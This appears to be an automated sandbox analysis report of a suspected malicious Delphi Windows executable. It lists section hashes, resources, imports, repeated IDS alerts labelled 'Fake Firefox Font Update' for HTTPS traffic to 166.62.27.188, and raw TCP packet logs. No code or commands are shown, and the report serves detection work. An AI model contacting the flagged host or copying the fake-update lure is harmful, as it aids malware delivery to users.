                    .text0x10000x6c4c00x6c60069c4173c38ad27686fb46f69fd79ec91False0.5070961288927336data6.531494017298441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .itext0x6e0000x8480xa00639613140a642faedd01bff468c3e3cfFalse0.523828125data5.552779847613545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x6f0000x1f400x200053b6dd6978c858db7e9faa57954b9c18False0.3963623046875data3.804120578626792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .bss0x710000x36ec0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata0x750000x266e0x2800f0f9a1156b641e5ea253cb6ddcaf08baFalse0.3103515625data4.872671403071516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls0x780000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0x790000x180x2005b11e123dd9b7f6d94b27d2ad6e9bc83False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x7a0000x7ce80x7e003b0f62de599dc8a77438a9e2115a0b81False0.6107390873015873data6.679791141044884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc0x820000xa1c000xa1c008e5b14b617cf2ca7bbd558247631f0f7False0.5015048420595054data7.104149858016797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x832440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                    RT_CURSOR0x833780x134dataEnglishUnited States0.4642857142857143
                    RT_CURSOR0x834ac0x134dataEnglishUnited States0.4805194805194805
                    RT_CURSOR0x835e00x134dataEnglishUnited States0.38311688311688313
                    RT_CURSOR0x837140x134dataEnglishUnited States0.36038961038961037
                    RT_CURSOR0x838480x134dataEnglishUnited States0.4090909090909091
                    RT_CURSOR0x8397c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                    RT_BITMAP0x83ab00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                    RT_BITMAP0x83c800x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                    RT_BITMAP0x83e640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                    RT_BITMAP0x840340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                    RT_BITMAP0x842040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                    RT_BITMAP0x843d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                    RT_BITMAP0x845a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                    RT_BITMAP0x847740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                    RT_BITMAP0x849440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                    RT_BITMAP0x84b140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                    RT_BITMAP0x84ce40x81940Device independent bitmap graphic, 971 x 182 x 24, image size 530712EnglishUnited States0.497995297238635
                    RT_BITMAP0x1066240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                    RT_BITMAP0x10674c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                    RT_BITMAP0x1068740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                    RT_BITMAP0x10699c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                    RT_BITMAP0x106a840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                    RT_BITMAP0x106bac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x106cd40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                    RT_BITMAP0x106da40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                    RT_BITMAP0x106ecc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                    RT_BITMAP0x106ff40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                    RT_BITMAP0x10711c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x1072440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                    RT_BITMAP0x10736c0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                    RT_BITMAP0x1074540x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                    RT_BITMAP0x10757c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x1076a40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                    RT_BITMAP0x1077740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                    RT_BITMAP0x10789c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                    RT_BITMAP0x1079c40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                    RT_BITMAP0x107aec0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x107c140x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                    RT_BITMAP0x107d3c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                    RT_BITMAP0x107e240x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                    RT_BITMAP0x107f4c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                    RT_BITMAP0x1080740xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                    RT_BITMAP0x1081440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                    RT_BITMAP0x10826c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                    RT_BITMAP0x1083940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                    RT_ICON0x10847c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m0.40560165975103735
                    RT_DIALOG0x10aa240x52data0.7682926829268293
                    RT_DIALOG0x10aa780x52data0.7560975609756098
                    RT_STRING0x10aacc0x35cdata0.45348837209302323
                    RT_STRING0x10ae280x2d8data0.4642857142857143
                    RT_STRING0x10b1000xc0data0.6770833333333334
                    RT_STRING0x10b1c00xecdata0.6483050847457628
                    RT_STRING0x10b2ac0x350data0.43514150943396224
                    RT_STRING0x10b5fc0x3ccdata0.37962962962962965
                    RT_STRING0x10b9c80x388data0.4092920353982301
                    RT_STRING0x10bd500x418data0.36736641221374045
                    RT_STRING0x10c1680x140data0.515625
                    RT_STRING0x10c2a80xccdata0.6127450980392157
                    RT_STRING0x10c3740x1ecdata0.5345528455284553
                    RT_STRING0x10c5600x3b0data0.326271186440678
                    RT_STRING0x10c9100x354data0.4107981220657277
                    RT_STRING0x10cc640x2a4data0.4363905325443787
                    RT_RCDATA0x10cf080x10data1.5
                    RT_RCDATA0x10cf180x338data0.6905339805825242
                    RT_RCDATA0x10d2500x1657cGIF image data, version 89a, 360 x 360EnglishUnited States0.594748459285808
                    RT_RCDATA0x1237cc0x369Delphi compiled form 'TForm1'0.6071019473081328
                    RT_GROUP_CURSOR0x123b380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                    RT_GROUP_CURSOR0x123b4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                    RT_GROUP_CURSOR0x123b600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123b9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_CURSOR0x123bb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                    RT_GROUP_ICON0x123bc40x14data1.25

                    Imports

                    DLLImport
                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                    kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                    oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                    ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                    kernel32.dllSleep
                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                    comdlg32.dllGetOpenFileNameA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2025-01-14T08:22:59.636291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731166.62.27.188443TCP
                    2025-01-14T08:23:01.167163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733166.62.27.188443TCP
                    2025-01-14T08:23:02.813843+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735166.62.27.188443TCP
                    2025-01-14T08:23:04.488009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737166.62.27.188443TCP
                    2025-01-14T08:23:06.112840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739166.62.27.188443TCP
                    2025-01-14T08:23:07.733763+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741166.62.27.188443TCP
                    2025-01-14T08:23:09.383947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743166.62.27.188443TCP
                    2025-01-14T08:23:11.014157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745166.62.27.188443TCP
                    2025-01-14T08:23:12.619106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747166.62.27.188443TCP
                    2025-01-14T08:23:14.247373+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749166.62.27.188443TCP
                    2025-01-14T08:23:15.878852+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751166.62.27.188443TCP
                    2025-01-14T08:23:17.483410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754166.62.27.188443TCP
                    2025-01-14T08:23:19.105707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449760166.62.27.188443TCP
                    2025-01-14T08:23:20.741081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449763166.62.27.188443TCP
                    2025-01-14T08:23:22.393223+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449765166.62.27.188443TCP
                    2025-01-14T08:23:23.995244+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449767166.62.27.188443TCP
                    2025-01-14T08:23:25.619767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449769166.62.27.188443TCP
                    2025-01-14T08:23:27.268780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449771166.62.27.188443TCP
                    2025-01-14T08:23:28.914870+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773166.62.27.188443TCP
                    2025-01-14T08:23:30.570804+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449775166.62.27.188443TCP
                    2025-01-14T08:23:32.186581+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449777166.62.27.188443TCP
                    2025-01-14T08:23:33.822406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449779166.62.27.188443TCP
                    2025-01-14T08:23:35.424446+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449781166.62.27.188443TCP
                    2025-01-14T08:23:37.077766+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449783166.62.27.188443TCP
                    2025-01-14T08:23:38.713940+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449785166.62.27.188443TCP
                    2025-01-14T08:23:40.474417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449787166.62.27.188443TCP
                    2025-01-14T08:23:42.191342+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449789166.62.27.188443TCP
                    2025-01-14T08:23:43.829758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449791166.62.27.188443TCP
                    2025-01-14T08:23:45.456082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449793166.62.27.188443TCP
                    2025-01-14T08:23:47.062353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449795166.62.27.188443TCP
                    2025-01-14T08:23:48.660247+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449797166.62.27.188443TCP
                    2025-01-14T08:23:50.280524+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449799166.62.27.188443TCP
                    2025-01-14T08:23:51.922767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449801166.62.27.188443TCP
                    2025-01-14T08:23:53.556382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449803166.62.27.188443TCP
                    2025-01-14T08:23:55.165928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449805166.62.27.188443TCP
                    2025-01-14T08:23:56.747415+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449808166.62.27.188443TCP
                    2025-01-14T08:23:58.377559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449811166.62.27.188443TCP
                    2025-01-14T08:24:00.013654+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449818166.62.27.188443TCP
                    2025-01-14T08:24:01.666961+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449830166.62.27.188443TCP
                    2025-01-14T08:24:03.454204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449846166.62.27.188443TCP
                    2025-01-14T08:24:05.066971+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449859166.62.27.188443TCP
                    2025-01-14T08:24:06.690050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449871166.62.27.188443TCP
                    2025-01-14T08:24:08.360097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449883166.62.27.188443TCP
                    2025-01-14T08:24:10.096831+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449895166.62.27.188443TCP
                    2025-01-14T08:24:11.705347+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449907166.62.27.188443TCP
                    2025-01-14T08:24:13.288550+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449919166.62.27.188443TCP
                    2025-01-14T08:24:14.876986+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449930166.62.27.188443TCP
                    2025-01-14T08:24:16.470933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449942166.62.27.188443TCP
                    2025-01-14T08:24:18.053865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449954166.62.27.188443TCP
                    2025-01-14T08:24:19.638587+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449967166.62.27.188443TCP
                    2025-01-14T08:24:21.390415+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449982166.62.27.188443TCP
                    2025-01-14T08:24:22.975306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449992166.62.27.188443TCP
                    2025-01-14T08:24:24.572059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450004166.62.27.188443TCP
                    2025-01-14T08:24:26.184511+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450016166.62.27.188443TCP
                    2025-01-14T08:24:27.810360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450028166.62.27.188443TCP
                    2025-01-14T08:24:29.395592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450038166.62.27.188443TCP
                    2025-01-14T08:24:31.000833+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450050166.62.27.188443TCP
                    2025-01-14T08:24:32.797140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450061166.62.27.188443TCP
                    2025-01-14T08:24:34.394719+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450073166.62.27.188443TCP
                    2025-01-14T08:24:35.989680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450087166.62.27.188443TCP
                    2025-01-14T08:24:37.609406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450099166.62.27.188443TCP
                    2025-01-14T08:24:39.409907+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450112166.62.27.188443TCP
                    2025-01-14T08:24:41.055359+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450124166.62.27.188443TCP
                    2025-01-14T08:24:42.806841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450129166.62.27.188443TCP
                    2025-01-14T08:24:44.404774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450131166.62.27.188443TCP
                    2025-01-14T08:24:46.721262+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450133166.62.27.188443TCP
                    2025-01-14T08:24:48.303889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450135166.62.27.188443TCP
                    2025-01-14T08:24:49.896063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450137166.62.27.188443TCP
                    2025-01-14T08:24:51.499235+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450139166.62.27.188443TCP
                    2025-01-14T08:24:53.082164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450141166.62.27.188443TCP
                    2025-01-14T08:24:54.782093+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450143166.62.27.188443TCP
                    2025-01-14T08:24:56.382168+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450145166.62.27.188443TCP
                    2025-01-14T08:24:58.007807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450147166.62.27.188443TCP
                    2025-01-14T08:24:59.617140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450149166.62.27.188443TCP
                    2025-01-14T08:25:01.343332+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450151166.62.27.188443TCP
                    2025-01-14T08:25:02.976140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450153166.62.27.188443TCP
                    2025-01-14T08:25:04.590604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450155166.62.27.188443TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2025 08:22:58.299256086 CET49730443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.299295902 CET44349730166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:58.299371004 CET49730443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.299510002 CET49730443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.299607992 CET44349730166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:58.299679041 CET49730443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.324261904 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.324312925 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:58.324400902 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.327610970 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:58.327644110 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:59.636060953 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:59.636291027 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:59.639878988 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:59.639935970 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:59.640352011 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:22:59.687587976 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:59.705112934 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:22:59.747350931 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.028953075 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.029073000 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.029133081 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.044218063 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.044255018 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.044274092 CET49731443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.044284105 CET44349731166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.189246893 CET49732443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.189306974 CET44349732166.62.27.188192.168.2.4
                    Jan 14, 2025 08:23:00.189394951 CET49732443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.196208954 CET49732443192.168.2.4166.62.27.188
                    Jan 14, 2025 08:23:00.196316004 CET44349732166.62.27.188192.168.2.4
